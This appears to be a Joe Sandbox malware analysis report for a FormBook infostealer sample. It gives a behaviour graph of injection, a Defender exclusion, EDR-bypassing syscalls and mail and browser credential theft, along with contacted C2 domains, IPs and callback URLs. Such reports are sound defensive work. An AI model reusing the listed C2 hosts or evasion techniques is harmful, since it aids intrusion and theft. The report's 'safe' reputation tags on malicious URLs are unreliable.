            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1506403 Sample: Scan 00093847.exe Startdate: 07/09/2024 Architecture: WINDOWS Score: 100 35 www.nevsehir-nakliyat.xyz 2->35 37 www.terrearcenciel.online 2->37 39 14 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Yara detected FormBook 2->51 55 6 other signatures 2->55 10 Scan 00093847.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\user\...\Scan 00093847.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 Scan 00093847.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 uspEUeZyrqFDmi.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 setupugc.exe 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 uspEUeZyrqFDmi.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 nosr.net 82.221.128.183, 56228, 80 THORDC-ASIS Iceland 27->41 43 www.mbwd.store 103.42.108.46, 56258, 56259, 56260 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia 27->43 45 7 other IPs or domains 27->45 71 Found direct / indirect Syscall (likely to bypass EDR) 27->71 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Scan 00093847.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.dyme.tech/pjne/0%Avira URL Cloudsafe
            http://www.mbwd.store0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers?0%Avira URL Cloudsafe
            http://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=&GtLD=xFGdQ6FH0%Avira URL Cloudsafe
            http://www.fontbureau.com/designersG0%Avira URL Cloudsafe
            http://www.nosr.net/ujbu/?GtLD=xFGdQ6FH&dxWljT6=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=0%Avira URL Cloudsafe
            http://www.tiro.com0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/?0%Avira URL Cloudsafe
            http://www.lilibetmed.online/3cch/0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://www.goodfont.co.kr0%Avira URL Cloudsafe
            http://www.lilibetmed.online/3cch/?GtLD=xFGdQ6FH&dxWljT6=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI=0%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers0%Avira URL Cloudsafe
            http://www.typography.netD0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            http://www.kryto.top/09dt/0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%Avira URL Cloudsafe
            http://www.complexity.pub/4c7j/?dxWljT6=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=&GtLD=xFGdQ6FH0%Avira URL Cloudsafe
            http://www.angelenterprise.biz/efkd/?GtLD=xFGdQ6FH&dxWljT6=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A=0%Avira URL Cloudsafe
            http://www.mbwd.store/pn1r/?dxWljT6=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&GtLD=xFGdQ6FH0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            http://www.fonts.com0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.domeneshop.no/whois0%Avira URL Cloudsafe
            http://www.sakkal.com0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
            https://www.domainnameshop.com/whois0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.complexity.pub/4c7j/0%Avira URL Cloudsafe
            http://www.nevsehir-nakliyat.xyz/csz1/?dxWljT6=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&GtLD=xFGdQ6FH0%Avira URL Cloudsafe
            http://www.fontbureau.com0%Avira URL Cloudsafe
            http://www.kryto.top/09dt/?dxWljT6=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&GtLD=xFGdQ6FH0%Avira URL Cloudsafe
            https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
            https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%Avira URL Cloudsafe
            http://www.masteriocp.online/wg84/0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/frere-user.html0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%Avira URL Cloudsafe
            https://www.domainnameshop.com/0%Avira URL Cloudsafe
            http://www.angelenterprise.biz/efkd/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers80%Avira URL Cloudsafe
            http://www.nevsehir-nakliyat.xyz/csz1/0%Avira URL Cloudsafe
            http://www.mbwd.store/pn1r/0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
            https://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0ei0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            nosr.net
            		82.221.128.183
            		truetrue
              		unknown
              angelenterprise.biz
              		3.33.130.190
              		truetrue
                		unknown
                dns.ladipage.com
                		18.139.62.226
                		truetrue
                  		unknown
                  www.complexity.pub
                  		217.160.0.127
                  		truetrue
                    		unknown
                    www.mbwd.store
                    		103.42.108.46
                    		truetrue
                      		unknown
                      www.dyme.tech
                      		13.248.169.48
                      		truetrue
                        		unknown
                        www.kryto.top
                        		162.0.213.94
                        		truetrue
                          		unknown
                          www.lilibetmed.online
                          		185.134.245.113
                          		truetrue
                            		unknown
                            natroredirect.natrocdn.com
                            		85.159.66.93
                            		truetrue
                              		unknown
                              www.terrearcenciel.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.monos.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.nosr.net
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.nevsehir-nakliyat.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.masteriocp.online
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.angelenterprise.biz
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.dyme.tech/pjne/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nosr.net/ujbu/?GtLD=xFGdQ6FH&dxWljT6=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lilibetmed.online/3cch/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=&GtLD=xFGdQ6FHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lilibetmed.online/3cch/?GtLD=xFGdQ6FH&dxWljT6=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI=true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kryto.top/09dt/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.complexity.pub/4c7j/?dxWljT6=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=&GtLD=xFGdQ6FHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mbwd.store/pn1r/?dxWljT6=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&GtLD=xFGdQ6FHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.angelenterprise.biz/efkd/?GtLD=xFGdQ6FH&dxWljT6=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A=true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.complexity.pub/4c7j/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.kryto.top/09dt/?dxWljT6=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&GtLD=xFGdQ6FHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nevsehir-nakliyat.xyz/csz1/?dxWljT6=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&GtLD=xFGdQ6FHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.masteriocp.online/wg84/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.angelenterprise.biz/efkd/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nevsehir-nakliyat.xyz/csz1/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mbwd.store/pn1r/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabsetupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designersGScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/?Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/bTheScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers?Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mbwd.storeuspEUeZyrqFDmi.exe, 0000000B.00000002.3555734438.0000000004FFB000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tiro.comScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designersScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=setupugc.exe, 00000009.00000002.3554601037.0000000004564000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000002F04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2361594319.000000001C224000.00000004.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.goodfont.co.krScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sajatypeworks.comScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.typography.netDScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cTheScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmScan 00093847.exe, 00000000.00000002.1844023650.0000000005900000.00000004.00000020.00020000.00000000.sdmp, Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fonts.comScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sandoll.co.krScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csssetupugc.exe, 00000009.00000002.3554601037.0000000004D3E000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.00000000036DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.domeneshop.no/whoissetupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScan 00093847.exe, 00000000.00000002.1836424368.000000000307A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comScan 00093847.exe, 00000000.00000002.1844565242.0000000005940000.00000004.00000020.00020000.00000000.sdmp, Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.domainnameshop.com/whoisuspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icosetupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.ecosia.org/newtab/setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.carterandcone.comlScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ac.ecosia.org/autocomplete?q=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cnScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-user.htmlScan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.domainnameshop.com/setupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eisetupugc.exe, 00000009.00000002.3554601037.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.000000000354C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          162.0.213.94
                                          		www.kryto.topCanada
                                          		35893ACPCAtrue
                                          13.248.169.48
                                          		www.dyme.techUnited States
                                          		16509AMAZON-02UStrue
                                          82.221.128.183
                                          		nosr.netIceland
                                          		50613THORDC-ASIStrue
                                          18.139.62.226
                                          		dns.ladipage.comUnited States
                                          		16509AMAZON-02UStrue
                                          217.160.0.127
                                          		www.complexity.pubGermany
                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                          185.134.245.113
                                          		www.lilibetmed.onlineNorway
                                          		12996DOMENESHOPOsloNorwayNOtrue
                                          103.42.108.46
                                          		www.mbwd.storeAustralia
                                          		45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                                          85.159.66.93
                                          		natroredirect.natrocdn.comTurkey
                                          		34619CIZGITRtrue
                                          3.33.130.190
                                          		angelenterprise.bizUnited States
                                          		8987AMAZONEXPANSIONGBtrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1506403
                                          Start date and time:2024-09-07 21:41:50 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 10m 49s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Run name:Run with higher sleep bypass
                                          Number of analysed new started processes analysed:12
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Scan 00093847.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@10/7@13/9
                                          EGA Information:
                                          • Successful, ratio: 75%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 120
                                          • Number of non-executed functions: 267
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target uspEUeZyrqFDmi.exe, PID 4008 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Scan 00093847.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          15:43:56API Interceptor6231395x Sleep call for process: setupugc.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          162.0.213.94Quote #011698.exeGet hashmaliciousFormBookBrowse
                                          • www.syvra.xyz/h2bb/
                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                          • www.syvra.xyz/h2bb/
                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                          • www.syvra.xyz/h2bb/
                                          0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                                          • www.rigintech.info/ig9u/
                                          RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                                          • www.zyfro.info/hnng/
                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                          • www.syvra.xyz/h2bb/
                                          PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                                          • www.syvra.xyz/h2bb/
                                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.kryto.top/09dt/
                                          factura-630.900.exeGet hashmaliciousFormBookBrowse
                                          • www.syvra.xyz/h2bb/
                                          PAGO $630.900.exeGet hashmaliciousFormBookBrowse
                                          • www.syvra.xyz/h2bb/
                                          13.248.169.48uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                          • pupydeq.com/login.php
                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                          • 13.248.169.48/
                                          firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                          • 13.248.169.48/
                                          firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                          • 13.248.169.48/
                                          firmware.i586.elfGet hashmaliciousUnknownBrowse
                                          • 13.248.169.48/
                                          firmware.i686.elfGet hashmaliciousUnknownBrowse
                                          • 13.248.169.48/
                                          firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                          • 13.248.169.48/
                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                          • www.dyme.tech/h7lb/
                                          SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exeGet hashmaliciousFormBookBrowse
                                          • www.omlyes.com/h209/?Dxo=iZtTggBZfUEO+HC6YKHWriWWpmX0i4qAS7HiYOC76+2tWZxBemDORvlFY8KUijKDxbXK&mnSl=Txlh
                                          PDPUOIE76867 PDF.exeGet hashmaliciousFormBookBrowse
                                          • www.intap.shop/he2a/?ZN9Ls=9rCTo2P0wPzDj0p&5jE=/Ua8ExDTUucouD7M2MREjCyHkUzXlcEX6KzIXilwzRyJg7omEuicfEdEyes3tq+sX5A8

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.dyme.techdoc330391202408011.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
